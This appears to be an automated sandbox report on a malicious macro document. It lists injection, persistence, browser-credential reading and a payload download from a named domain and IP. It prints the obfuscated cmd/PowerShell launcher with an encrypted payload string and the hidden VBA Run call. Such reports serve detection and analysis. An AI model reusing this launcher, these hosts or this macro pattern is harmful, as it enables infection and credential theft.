|
|
5/5
|
Injection
|
Writes into the memory of a process running from a created or modified executable
|
-
|
|
|
-
"c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe" modifies memory of "c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe"
|
|
|
5/5
|
Injection
|
Modifies control flow of a process running from a created or modified executable
|
-
|
|
|
-
"c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe" alters context of "c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe"
|
|
|
4/5
|
Process
|
Creates process
|
-
|
|
|
-
Creates process "Cmd tQZwbXH KCoJvcWVmThmQFEmEKTc lBUvzuulqjniw & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %mSjUIVjKCvrosnG%=YaAhiJLINtE&&set %iibdZAhWS%=p&&set %UKkjOWmc%=o^w&&set %CKJHjErkGaOznLZ%=UbmSUqbPikMOd&&set %orvBFUr%=!%iibdZAhWS%!&&set %GaGORjztoIjBCAG%=bMVIRrhb&&set %miGHuQvztiW%=e^r&&set %PRCHEZFPHY%=!%UKkjOWmc%!&&set %PqsKzFkV%=s&&set %bjMitdwscHzzIkV%=ZzjSCRRpVGC&&set %McrAWpDQaNJ%=he&&set %jwjXbhMi%=ll&&!%orvBFUr%!!%PRCHEZFPHY%!!%miGHuQvztiW%!!%PqsKzFkV%!!%McrAWpDQaNJ%!!%jwjXbhMi%! " ( [rUnTImE.INteRoPsERvICEs.MARshAl]::PTrTOsTrIngbSTR([RUNtIMe.INtEROpserVIcEs.MarshAL]::securEStRinGtObsTR( $('76492d1116743f0423413b16050a5345MgB8AHgAdgBHAHQANgB4AHIANwAyAFUANgBzAEsAbgB2AC8ANAA2ADQAaQByAHcAPQA9AHwANQBiADIAZABjAGYAZQBkAGMAMAA3AGMAYgA5ADAANgBkAGYAMwBjAGQANQBkADEANAA0ADgAOAA1ADkAYwBjADcAYQAzADcAYwBmAGQAZQBjADcANAAwAGIAZgAwAGYANwBlADkANgA2ADIAZgAxADcAMABiADYAYgBkADcAZQA2AGMAZQA5ADYAZgBhAGYAZgBiAGYAOQBjADEAYQBhADIAYgA5ADUAYQA1ADUAMwBmADkAYwAwAGYANwA5AGMANgA0ADEANwA2AGEAYgA0ADQAYgBmAGIANgBmADgAMAAzADYAOQA3AGIAYgBiADAANgA2AGEANQA4ADYAYQA0ADEAMABlAGUANgA4ADAAYgAyAGEAMgA5AGUAOQBkADQAOAA1ADQAYQAyADAAYQA4AGUANQA0AGYAMQAyAGQAYwBhADAANABmADMANABlAGMAZgA1AGUAMgAzADEANwBjADQAMgBkAGEAMQBmAGUAMwBiADYAYgBlADQAMgAzADMAMwAyAGIANgA4AGUAYgA1ADQAMQBlADQANwAyADUAZQBjADEAOQBlAGMANABiAGEAYwBiADAAMABjAGQAYwA1AGQAYQA4ADAANQBhADUANAAyAGUANAAzADUAOABmADcAMgAwADYAYQA2AGYAYwA4ADUAMgA5ADkAMwA5ADcAYwA5ADYAMQBiADgAYgA0ADIAMgBiADUANgAzAGQAYgA5AGUAMgA0ADAANABhADEANQA4AGMAZQBhAGUAMAA3AGEANwAzADUAZQBjADMAMwBiAGUANABlADYAMAA1ADkAMABmAGMAMQAzADcAMQAwADIAOQAxADYAMAA4ADYAMwAyADUAMAA3AGQAYgBiADQAMQBhAGIAYgBkAGYAZgA0AGMANwA0ADMAYwA4ADkAYQBkAGYAOAA5ADQAYQBhAGMAZgAyADUANwBhADEANAA1AGQAZQA0ADAAYQA3ADUANQAxADIAOQAzAGIAZgA0AGMAMwAyADQAMgA2ADQANgBiADEAOQBjAGEAYQAxADkAZAA4ADMANQAwADIAYwAzADEAZQA2AGEAOQAxADUAOAA4AGYAZgAxADMAMwBjADUANQAwADYAMwBmADkANQBmADcAOQBjADUAMABiADMANwAwAGEAMgAzADUAYQAzADMAYgA1ADQAMwBkADQAZABhADQAYwA5ADIAMgBiAGIAZQA1ADgAYgBlAGEANgAyADMANwA5ADgAZAA4ADQAMgBmADQAMQBmAGMAOAA0ADAAZgBmADYAMAA2AGIAMQA5AGYAMgBmAGUAYwAxADUAMwA5ADkAMgBjADEANQAyADEAOABlAGYAMQAxADQAYQBhADUAOABjADcANQA3AGQAZgAzADIAMABjAGEAMAA5AGUAMAAwADAAMAAzADkANgA2ADgAZgBjADAAOQA2AGIAMQAwAGYAMwBiAGUAYQAxADIAMAAxADMAZQAyADQAZAA0ADcANQAxAGUANwAyAGQAMwBlAGUAYgA2AGIAMwBiADIAMgA2ADEAYgAwADcAOAA2ADcAOQA3ADEAYwA1ADIAZgBhADYANAA4ADIAMgAwADIAZAA2AGQANQBhADEANwA4ADUANgAwADIANABhADgAMAA5AGUAMgA1AGMANwBjADgANwBjAGQAZQAwAGUANABkADcAYwA2ADUAYQBhADAAYwBhADgANQBkADgANgBjADMAYwA1ADUAYgA5ADYAZQBmADUAOABhAGEANgAwADcAOAA3ADUANQA0ADkANgAzAGYAZAA2ADAAMwAzADAAYwBkADQAOQBkAGMAZgAyAGMANQA2AGQAYgBhAGIAZQBmADkAYQBjAGMAMABiADgANgA1AGMAYQBhAGEAMQAzAGQAMAAzADUAZABjADkAZQBjADcAZAA2ADAANAAxAGYAMwA2ADQAOAA3ADAAZAAwADUANwA3ADYANABkADQAOABkADQAMwBlADIAYwBlADEANQA2ADMAZgBjADYAOQBlADIANwA1ADIAYgA4ADcAMwBiADgAMQA1ADcAYgBlADUANQA5ADgAMgBkADkANQBhADUAMQA5AGUAOQBlAGYAZgBmAGIAYQA2AGUANwA2AGUANAA0ADgAYgAzADMAZQBhADgAZQAzAGQANwAxADUAMwA4ADkAZQA5ADgANAA3ADUAYQA0ADcAOAAyAGIAMgBiADAAMQA4AGEAOQA0ADAAMQAwAGQAZQA2AGMANwA3ADkAOAA0AGIAZgAxADAANABhAGMAYwBkADcANgA4ADkAYgAxADYANgA0AGQAMgBjADIAYgA1ADkANQAzADIAZAAzADEANQA2ADQAZQBlADYAMQA1AGUAYgBhAGUANAA1ADEAYwAzAGQANwA0ADgAOAA5AGQAZQA2AGEANgBjADIAMABjADgAYQAwADUANQA5ADIAMgAxADAAMABkAGQANABmADAAOABhADAAMABmAGYANQA0ADgAYgA1AGMAZQBjAGIANABkADMAOQAyADAANgBjAGMANABiAGEAZQA3AGQANQBlAGYAOQA2AGUAMgBmADcAMwBmAGIANgBkADcAZAAwADQANwA0AGUANgAyAGQAYgA5AGMANgBlADQAOQBmADgAMwA2ADkANwA5ADAANgAxADIANwA4ADEANwA4AGEAMQBiADgAOAA3ADMANQBjAGUANQA4ADgAYwA1ADMAMgBkADgANAA1AGIAMwA5ADQAYQBmADAANQBiAGIAMwA5ADMAMQA5ADUANAA2AGUAZQA1ADgAOAAyADAANQAxADUAMgBiAGMAMwBkAGIAYwBiADkAOQA3AGUAMQA4ADgANwBmAGQAMAAwADAANAA1AGYAYwA0AGUAZAAwAGIAOQBjADQAOAAxADcANABiAGYAMABlADgAYgBmADIAZgBjAGMANQA2ADQANAAxADcANQAyADQAZgA4ADMANABlAGYAOABhADcAMAA3ADgANABlADQAYwA5AGIAYQAzADQANgA4AGUAOABlAGMAYQAxADYAOABjAGEAZgAxADcAZgA3AGMAZQBlADMANwAwAGEAYgAzADYAZgBkAGIANgA3ADcAOAAxAGEANQA5ADQAZgBjADAAMgBmADgANgAzADQANgAwAGMAYwAwAGMAZgBjADcAYwBlADYAYgBmADQAYgAzAGYANQBlAGQAMgBmAGIAMgA5ADEAOQBjAGMAYgBiADMAMwBjAGIAYwBhAGMAYQBlADkAOQA0ADcAOAA0ADUAOABhADMAYgBlADMANwBkADcAZQAwADAAMwBhADcAYgBlAGIAYQAxAGYAZQBhADEAMABhADkAOAA0ADgAMwA1AGMAMwA0ADkAZAA4ADkAZQA4ADkAYgA4ADAANAA2ADMAYgAyADAANgA2AGUAZAA0ADUAYwA5ADIANAA1ADcAMgA3ADEANwAyAGQAYQAyADEAZQA3AGMANABkADUAYgAzADAAYwA0ADkAOQBlAGYAZQBkAGYAMABlAGEAZABmADIANwBlADkAOQA1AGQAMwBmAGQAYgBjADEAMwA3ADMAMwBlAGMAOQBiADEAMwA3AGUAZgBjADUAOABlADMAYwA3ADEAOAAwADUAYwA1ADAAZQA2AGEAYgA0AGQAMgA0ADQANgBmADMAZQBhAGMANwA5AGYAMQBlAGYANwBmADIAYgAyADkAOABhADgAZABiADMAZABkADYAOQBiADUAOAAwADMANgA5AGUAOABkAGUANgBlAGUAMgBlADgAMwA4ADkAOAAyADAAMQBlAGIAZABiADUAMwBlADQAZQBhADcAYQBlAGEAMwBhADQAOABlADAAYwA2AGQAZABhADgAZgAwADYANQBjADMAMwAwAGQANQA2ADkANQBiAGQANQA4ADMAZgBhAGMAMwA2AGMAZgA4ADUAMQA2ADUAMABmAGUAMQA5AGUAMQAxADQANABhADQAZAA5ADUANABkAGIANwA3ADAAMABiADEAOQA4ADYAOQAxADMAYgAxAGYAMgA4ADYAZgBiADUAZgBjADYAOQBlADMAZQBjAGQANwBkAGIANAA3ADMAZAA0ADMAZQBlAGYAYwA1AGYAZgA5AGUANAA2ADUAOAA1ADYANwAzAGEAZQAzADUAMABhADgAMgA0ADEAMwAzAGYAYwAwADAANgA0AGIAZQAwAGQANQBkAGYAYQAxADIAZQBlAGYAOAA1ADgAZgA5ADgAMwA2ADIAOQAwAGMAMQAwADcAMAA0ADQAYgA4AGEAZgAwADkANgA2ADUANAA3AGMAMgBlADIAYgA3AGUAOQBlADgAZQBiAGIAMABhAGYANgAyAGEAMQA0AGEAYQBhADUAMAA4AGIANAA0ADMAYgBmA".
|
|
|
-
Creates process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe".
|
|
|
-
Creates process "C:\Users\Public\119901.exe".
|
|
|
-
Creates process "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe".
|
|
|
-
Creates process ""C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe" /scomma "C:\ProgramData\114E.tmp"".
|
|
|
-
Creates process ""C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe" /scomma "C:\ProgramData\114F.tmp"".
|
|
|
-
Creates process ""C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe" "C:\ProgramData\1150.tmp"".
|
|
|
4/5
|
Information Stealing
|
Reads browser data
|
-
|
|
|
-
Possibly trying to readout browser credentials.
|
|
|
4/5
|
Network
|
Downloads data
|
Downloader
|
|
|
-
URL "anatexis.de/RXDWHpi/".
|
|
|
|
|
|
3/5
|
Network
|
Performs DNS request
|
-
|
|
|
-
Resolves host name "anatexis.de".
|
|
|
3/5
|
Persistence
|
Installs system startup script or application
|
-
|
|
|
-
Adds ""C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe"" to Windows startup via registry.
|
|
|
3/5
|
Browser
|
Reads data related to browsing history
|
-
|
|
|
-
Reads the browsing history for "Microsoft Internet Explorer".
|
|
|
3/5
|
PE
|
Executes dropped PE file
|
-
|
|
|
-
Executes dropped file "c:\users\public\119901.exe".
|
|
|
2/5
|
File System
|
Associated with suspicious files
|
Trojan
|
|
|
-
File "c:\users\public\119901.exe" is a known suspicious file.
|
|
|
2/5
|
Network
|
Connects to HTTP server
|
-
|
|
|
|
|
|
-
URL "anatexis.de/RXDWHpi/".
|
|
|
2/5
|
PE
|
Drops PE file
|
Dropper
|
|
|
-
Drops file "c:\users\public\119901.exe".
|
|
|
2/5
|
VBA Macro
|
Creates suspicious COM object
|
-
|
|
|
-
CreateObject(XrYXkwzRVL).Run uQQGIzipbjUbP + Chr(VBA.vbKeyC) + PqsKzFkV + nNjzQh + koKJNYMrs, vbHide
|
|
|
1/5
|
Process
|
Creates system object
|
-
|
|
|
-
Creates mutex with name "Global\.net clr networking".
|
|
|
-
Creates mutex with name "Global\I705BA84C".
|
|
|
-
Creates mutex with name "Global\M705BA84C".
|
|
|
1/5
|
Network
|
Associated with known malicious/suspicious URLs
|
-
|
|
|
-
URL "23.239.28.4" is known as suspicious URL.
|
